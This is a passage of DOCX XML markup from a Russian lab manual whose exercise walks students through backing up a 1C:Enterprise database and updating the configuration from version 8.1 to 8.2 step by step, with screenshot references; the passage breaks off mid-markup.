      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие виды установки программного обеспечения вы можете назвать?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Что понимается под запуском приложения от имени администратора?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc507788503"/>
      <w:bookmarkStart w:id="147" w:name="_Toc507788233"/>
      <w:bookmarkStart w:id="148" w:name="_Toc507786842"/>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>II</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Обновление программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
      <w:bookmarkEnd w:id="147"/>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Обновление и настройка версий платформы 1С 8.2 для Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимательно ознакомиться с подробным алгоритмом установки программного продукта. На основе прочитанного документа выработать краткие рекомендации по установке ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для установки платформы 1С 8.2 для Windows на компьютер пользователя вам понадобится дистрибутив платформы. Чтобы обновить платформу, вам нужно сделать абсолютно тоже самое, что и при установке платформы. Установка на сервер 1С Предприятия отличается от установки рассматриваемой ниже. Мы рассмотрим установку для файловых баз 1С Предприятие. Это наиболее распространенный вариант использования программ 1С . Рассмотрим установку на примере платформы 1С 8.2.15.317.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка версии платформы 1С 8.3 ничем не отличается от 8.2 поэтому данная инструкция подойдет и для нее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установочные файлы дистрибутива выглядят следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2004150" cy="1437596"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="431" name="Рисунок 29969" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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69" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image253.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId320" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2006045" cy="1438955"/>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Если нет дистрибутива, но есть подписка на ИТС (информационно-технологическое сопровождение) у партнеров 1С, вы можете скачать эти файлы с диска ИТС, либо с сайта users.v8.1c.ru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Изучить процесс обновления программы 1С: Предприятие с версии 8.1. на версию 8.2. Описать процесс и порядок обновления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Запускаем программу 1С в режиме «Конфигуратор»:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2004150" cy="1248981"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="432" name="Рисунок 1" descr="http://ok-t.ru/studopedia/baza13/1714586139566.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ok-t.ru/studopedia/baza13/1714586139566.files/image001.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId321" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2004118" cy="1248961"/>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1- Запуск программы 1С в режиме «Конфигуратор»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Сохраняем копию базы перед обновлением для возможности восстановления в случае неудачного обновления рисунок 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2104950" cy="1039504"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="433" name="Рисунок 2" descr="http://ok-t.ru/studopedia/baza13/1714586139566.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ok-t.ru/studopedia/baza13/1714586139566.files/image002.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId322" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2105161" cy="1039608"/>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2- Сохранение копии базы перед обновлением</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Указываем путь для сохранения копии базы и нажимаем «Сохранить» рисунок 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1701750" cy="1227365"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="434" name="Рисунок 3" descr="http://ok-t.ru/studopedia/baza13/1714586139566.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ok-t.ru/studopedia/baza13/1714586139566.files/image004.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId323" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1701759" cy="1227372"/>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3- Путь для сохранения копии базы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. После успешного сохранения базы появится сообщение рисунок 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2436150" cy="451049"/>
            <wp:effectExtent l="19050" t="0" r="2250" b="0"/>
            <wp:docPr id="435" name="Рисунок 4" descr="http://ok-t.ru/studopedia/baza13/1714586139566.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ok-t.ru/studopedia/baza13/1714586139566.files/image006.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId324" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2436769" cy="451164"/>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4- Окно завершения сохранения базы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Теперь заходим в меню «Конфигурация» -&gt; «Поддержка» -&gt; «Обновить конфигурацию» рисунок 5:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1896150" cy="755469"/>
            <wp:effectExtent l="19050" t="0" r="8850" b="0"/>
            <wp:docPr id="436" name="Рисунок 5" descr="http://ok-t.ru/studopedia/baza13/1714586139566.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ok-t.ru/studopedia/baza13/1714586139566.files/image008.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId325" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1896410" cy="755572"/>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5- Меню конфигурация</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Меняем на «Выбор файла обновления» рисунок 6:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1723526" cy="1303200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="437" name="Рисунок 6" descr="http://ok-t.ru/studopedia/baza13/1714586139566.files/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ok-t.ru/studopedia/baza13/1714586139566.files/image009.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId326" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1723555" cy="1303222"/>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6- Выбор файла обновления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Через выбор (красная цифра 1 на рисунке) указываем файл 1сv8.cfu, содержащий обновление для вашей конфигурации 1С 8, и нажимаем «Открыть», после чего «Готово» рисунок 7:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1405278" cy="1742400"/>
            <wp:effectExtent l="19050" t="0" r="4422" b="0"/>
            <wp:docPr id="438" name="Рисунок 7" descr="http://ok-t.ru/studopedia/baza13/1714586139566.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ok-t.ru/studopedia/baza13/1714586139566.files/image011.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId327" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1405112" cy="1742194"/>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7- Выбор файла обновления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Появится окно с информацией о файле обновления, в котором нажимаем «Продолжить обновление» рисунок 8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1665750" cy="1105362"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="439" name="Рисунок 8" descr="http://ok-t.ru/studopedia/baza13/1714586139566.file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ok-t.ru/studopedia/baza13/1714586139566.files/image013.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId328" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1665890" cy="1105455"/>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8 - Окно с информацией о файле обновления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9. Следующее окно содержит информацию о текущей версии программы и о версии обновления. Нажимаем в нем «ОК» рисунок 9:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1464150" cy="1110354"/>
            <wp:effectExtent l="19050" t="0" r="2700" b="0"/>
            <wp:docPr id="440" name="Рисунок 9" descr="http://ok-t.ru/studopedia/baza13/1714586139566.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ok-t.ru/studopedia/baza13/1714586139566.files/image014.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId329" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1464105" cy="1110320"/>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9- Окно с информацией о текущей версии программы и о версии обновления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10. Следующие минут 5-10 будет происходить обновление информационной базы, которое закончится появлением информационного окна рисунок 10:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1402740" cy="602055"/>
            <wp:effectExtent l="19050" t="0" r="6960" b="0"/>
            <wp:docPr id="441" name="Рисунок 10" descr="http://ok-t.ru/studopedia/baza13/1714586139566.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ok-t.ru/studopedia/baza13/1714586139566.files/image015.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId330" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1402827" cy="602092"/>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10- Информационное окно</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11. Нажимаем «Да»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12. В окне реорганизации информации нажимаем «Принять» рисунок 11:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1922978" cy="1267200"/>
            <wp:effectExtent l="19050" t="0" r="1072" b="0"/>
            <wp:docPr id="442" name="Рисунок 11" descr="http://ok-t.ru/studopedia/baza13/1714586139566.file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ok-t.ru/studopedia/baza13/1714586139566.files/image016.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId331" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1925581" cy="1268915"/>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11- Окно реорганизации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13. На этом обновление базы завершено. Теперь закрываем полностью конфигуратор и запускаем 1С в режиме «Предприятия» рисунок 12:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2155350" cy="877503"/>
